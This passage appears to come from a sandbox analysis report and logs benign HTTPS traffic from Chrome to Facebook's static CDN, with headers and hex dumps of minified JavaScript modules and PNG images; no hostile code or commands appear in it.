                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: PwWGt1MpK464VR7CsDP0S1LHJhy2ktp2iKSpni8+CPuhzkc8SZqrx2mWgZYoiOMsTeh3zPaAYu8JeMwS6FBngA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=5, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 50088
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC15861INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 73 79 6e 63 44 4f 4d 22 2c 5b 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 46 42 4c 6f 67 67 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 7b 69 6e 76 6f 6b 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 7b 76 61 72 20 65 3d 61 5b 64 5d 2c 66 3d 65 5b 30 5d 2c 67 3d 65 5b 31 5d 2c 68 3d 65 5b 32 5d 3b 65 3d 65 5b 33 5d 3b 68 3d 68 26 26 63 7c 7c 6e 75 6c 6c 3b 67 26 26 28 68 3d 62 28 22 44 4f 4d 22 29 2e 73 63 72 79 28 68 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 67 29 5b 30 5d 29 3b 68 7c 7c 62 28 22 46 42 4c 6f 67 67 65 72 22
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("AsyncDOM",["CSS","DOM","FBLogger"],(function(a,b,c,d,e,f){a={invoke:function(a,c){for(var d=0;d<a.length;++d){var e=a[d],f=e[0],g=e[1],h=e[2];e=e[3];h=h&&c||null;g&&(h=b("DOM").scry(h||document.documentElement,g)[0]);h||b("FBLogger"
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 65 20 64 69 73 70 6c 61 79 20 73 74 61 72 74 65 64 2e 20 54 68 69 73 20 69 73 20 61 20 6e 6f 2d 6f 70 2e 22 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 76 61 72 20 61 2c 62 3d 6e 65 77 28 63 28 22 44 65 66 65 72 72 65 64 22 29 29 28 29 3b 65 2e 70 75 73 68 28 62 2e 67 65 74 50 72 6f 6d 69 73 65 28 29 29 3b 72 65 74 75 72 6e 20 63 28 22 54 69 6d 65 53 6c 69 63 65 22 29 2e 67 75 61 72 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 26 26 63 28 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 29 28 61 29 2c 62 2e 72 65 73 6f 6c 76 65 28 29 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 44 69 73 70 6c 61 79 42 6c 6f 63 6b 69 6e 67 45 76 65 6e 74 22 2c 7b 70 72 6f 70 61 67 61 74 69 6f 6e 54 79 70 65 3a 63 28 22 54 69 6d 65 53 6c 69 63 65 22 29 2e 50 72
                                                                                                                                                                                                                                  Data Ascii: e display started. This is a no-op.");return function(){}}var a,b=new(c("Deferred"))();e.push(b.getPromise());return c("TimeSlice").guard(function(){a&&c("clearTimeout")(a),b.resolve()},"AsyncRequestDisplayBlockingEvent",{propagationType:c("TimeSlice").Pr
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 2e 61 62 6f 72 74 28 29 3b 61 2e 73 65 74 54 72 61 6e 73 70 6f 72 74 45 72 72 6f 72 48 61 6e 64 6c 65 72 28 64 29 7d 61 2e 61 62 6f 72 74 48 61 6e 64 6c 65 72 28 29 3b 4b 2e 75 6e 73 63 68 65 64 75 6c 65 28 61 29 7d 29 7d 3b 65 2e 61 62 61 6e 64 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 74 68 69 73 2e 63 6f 6e 74 69 6e 75 61 74 69 6f 6e 2e 6c 61 73 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3b 63 28 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 22 29 28 61 2e 74 69 6d 65 72 29 3b 61 2e 73 65 74 4f 70 74 69 6f 6e 28 22 73 75 70 70 72 65 73 73 45 72 72 6f 72 41 6c 65 72 74 73 22 2c 21 30 29 2e 73 65 74 48 61 6e 64 6c 65 72 28 62 3d 63 28 22 65 6d 70 74 79 46 75 6e 63 74 69 6f 6e 22 29 29 2e 73 65 74 45 72 72 6f 72 48 61
                                                                                                                                                                                                                                  Data Ascii: .abort();a.setTransportErrorHandler(d)}a.abortHandler();K.unschedule(a)})};e.abandon=function(){var a=this;this.continuation.last(function(){var b;c("clearTimeout")(a.timer);a.setOption("suppressErrorAlerts",!0).setHandler(b=c("emptyFunction")).setErrorHa
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1458INData Raw: 2c 63 3b 28 61 3d 62 28 22 41 72 62 69 74 65 72 22 29 29 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 68 2c 5b 28 63 3d 62 28 22 50 61 67 65 45 76 65 6e 74 73 22 29 29 2e 42 49 47 50 49 50 45 5f 44 4f 4d 52 45 41 44 59 2c 62 28 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 29 2e 49 4e 49 54 49 41 4c 5f 4a 53 5f 52 45 41 44 59 5d 29 3b 61 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 69 2c 5b 63 2e 42 49 47 50 49 50 45 5f 44 4f 4d 52 45 41 44 59 2c 63 2e 42 49 47 50 49 50 45 5f 4f 4e 4c 4f 41 44 2c 62 28 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 29 2e 49 4e 49 54 49 41 4c 5f 4a 53 5f 52 45 41 44 59 5d 29 3b 61 2e 73 75 62 73 63 72 69 62 65 28 63 2e 4e 41 54 49 56 45 5f 4f 4e 42 45 46 4f 52 45 55 4e 4c 4f 41 44 2c 66 75 6e 63
                                                                                                                                                                                                                                  Data Ascii: ,c;(a=b("Arbiter")).registerCallback(h,[(c=b("PageEvents")).BIGPIPE_DOMREADY,b("InitialJSLoader").INITIAL_JS_READY]);a.registerCallback(i,[c.BIGPIPE_DOMREADY,c.BIGPIPE_ONLOAD,b("InitialJSLoader").INITIAL_JS_READY]);a.subscribe(c.NATIVE_ONBEFOREUNLOAD,func


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  48192.168.2.649775157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC375OUTGET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: OcEdZWIg79UvSWVADRSQCg==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 06:49:22 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: mt4yu4rn9RgdICtFEITOprhkXG/DUQKZF6WNE/bk/dJVHZ8N+3oVEiojXQLhxWSulEkWX/ZHfJyN+uOs8WLX7Q==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 95
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 89
                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC94INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 0a a0 33 31 78 00 00 00 0a 49 44 41 54 08 1d 63 60 00 00 00 02 00 01 cf c8 35 e5 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR%VPLTEz=tRNS31xIDATc`5IENDB`


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  49192.168.2.649776157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC375OUTGET /rsrc.php/v3/yZ/r/YwPTeE82t1h.png HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1876INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: QyE5Q1JQF3oDPNLRd40ogw==
                                                                                                                                                                                                                                  Expires: Wed, 17 Sep 2025 05:29:52 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 4XwOR6V4R9wOYu7LDa4fmQqUlzlv/Q35RZVjZfoYHKm3w27QyNDvx0eu5ATeW/IrwKkV25uaUb5K0Zmmty4e1w==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=91, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 3535
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 89
                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC3534INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ab 00 00 00 38 08 03 00 00 00 b5 c4 f8 c6 00 00 02 91 50 4c 54 45 47 70 4c ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR8PLTEGpL


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  50192.168.2.649777157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC592OUTGET /rsrc.php/v3i-G34/yn/l/ru_RU/Td5hkdtkXX5.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1946INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: d47OlUqeaNvCHt+edjdQkA==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 17:14:05 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: UzFWRZed8Isfz6GCVS6azRz3ICjW9q0Ms0y3yLzEa8p/2AM3zZX/oxuTZGigGmNJjN4nQz0wqBTTbMIJ5UcL8g==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=95, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=18, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 356545
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC15859INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 69 76 65 46 6f 63 75 73 52 65 67 69 6f 6e 55 74 69 6c 73 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3b 61 3d 68 7c 7c 64 28 22 72 65 61 63 74 22 29 3b 62 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 3b 63 3d 62 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 63 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 73 65 43 68 61 6d 65 6c 65 6f 6e 54 68 65 6d 65 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("ActiveFocusRegionUtilsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);c=b;g["default"]=c}),98);__d("BaseChameleonThemeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";v
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC16384INData Raw: 65 6f 66 20 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 65 2e 63 61 6c 6c 28 61 2c 62 3f 64 2e 76 61 6c 75 65 3a 2d 31 29 2c 64 2e 63 61 6e 54 61 62 3d 62 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 76 61 72 20 62 3d 61 2e 5f 74 61 62 49 6e 64 65 78 53 74 61 74 65 3b 69 66 28 21 62 29 72 65 74 75 72 6e 20 61 2e 74 61 62 49 6e 64 65 78 3e 30 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 62 2e 63 61 6e 54 61 62 7d 66 2e 73 65 74 45 6c 65 6d 65 6e 74 43 61 6e 54 61 62 3d 61 3b 66 2e 63 61 6e 45 6c 65 6d 65 6e 74 54 61 62 3d 62 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 46 6f 63 75 73 52 65 67 69 6f 6e 2e 72 65 61 63 74 22 2c 5b 22 41 63 74 69 76 65 46 6f 63 75 73 52 65 67 69 6f 6e 55 74 69 6c 73 43 6f 6e 74 65 78 74 22 2c 22 46 6f 63 75 73 4d 61 6e 61 67 65
                                                                                                                                                                                                                                  Data Ascii: eof e==="function"&&(e.call(a,b?d.value:-1),d.canTab=b)}function b(a){var b=a._tabIndexState;if(!b)return a.tabIndex>0;else return b.canTab}f.setElementCanTab=a;f.canElementTab=b}),66);__d("FocusRegion.react",["ActiveFocusRegionUtilsContext","FocusManage
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 3b 0a 5f 5f 64 28 22 75 73 65 57 65 62 50 72 65 73 73 61 62 6c 65 54 6f 75 63 68 53 74 61 72 74 48 61 6e 64 6c 65 72 22 2c 5b 22 55 73 65 72 41 67 65 6e 74 22 2c 22 70 61 73 73 69 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 55 74 69 6c 22 2c 22 72 65 61 63 74 22 2c 22 75 73 65 44 79 6e 61 6d 69 63 43 61 6c 6c 62 61 63 6b 44 41 4e 47 45 52 4f 55 53 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 28 68 7c 7c 64 28 22 72 65 61 63 74 22 29 29 2e 75 73 65 45 66 66 65 63 74 3b 62 3d 63 28 22 55 73 65 72 41 67 65 6e 74 22 29 2e 69 73 42 72 6f 77 73 65 72 28 22 53 61 66 61 72 69 22 29 7c 7c 63 28 22 55 73 65 72 41 67 65 6e 74 22 29 2e 69 73 42 72 6f 77 73 65 72 28
                                                                                                                                                                                                                                  Data Ascii: ;__d("useWebPressableTouchStartHandler",["UserAgent","passiveEventListenerUtil","react","useDynamicCallbackDANGEROUS"],(function(a,b,c,d,e,f,g){"use strict";var h,i=(h||d("react")).useEffect;b=c("UserAgent").isBrowser("Safari")||c("UserAgent").isBrowser(
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 63 74 69 6f 6e 22 29 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 43 6f 6d 65 74 46 65 65 64 4c 6f 67 67 69 6e 67 45 78 74 72 61 46 69 65 6c 64 73 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3b 61 3d 68 7c 7c 64 28 22 72 65 61 63 74 22 29 3b 62 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 7b 7d 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 43 6f 6d 65 74 54 72 61 63 6b 69 6e 67 43 6f 64 65 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73
                                                                                                                                                                                                                                  Data Ascii: ction"));g["default"]=b}),98);__d("CometFeedLoggingExtraFieldsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext({});g["default"]=b}),98);__d("CometTrackingCodeContext",["react"],(function(a,b,c,d,e,f,g){"us
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC1500INData Raw: 7a 65 3a 22 78 6e 67 6e 73 6f 32 22 2c 77 6f 72 64 57 72 61 70 3a 22 78 31 76 76 6b 62 73 22 2c 24 24 63 73 73 3a 21 30 7d 2c 68 72 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 78 34 32 78 30 79 61 22 2c 62 6f 72 64 65 72 54 6f 70 53 74 79 6c 65 3a 22 78 31 65 6a 71 33 31 6e 22 2c 62 6f 72 64 65 72 45 6e 64 53 74 79 6c 65 3a 22 78 64 31 30 72 78 78 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 53 74 79 6c 65 3a 22 78 31 73 79 30 65 74 72 22 2c 62 6f 72 64 65 72 53 74 61 72 74 53 74 79 6c 65 3a 22 78 31 37 72 30 74 65 65 22 2c 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 3a 22 78 39 37 32 66 62 66 22 2c 62 6f 72 64 65 72 45 6e 64 57 69 64 74 68 3a 22 78 63 66 75 78 36 6c 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 57 69 64 74 68 3a 22 78 31 71 68 68 39
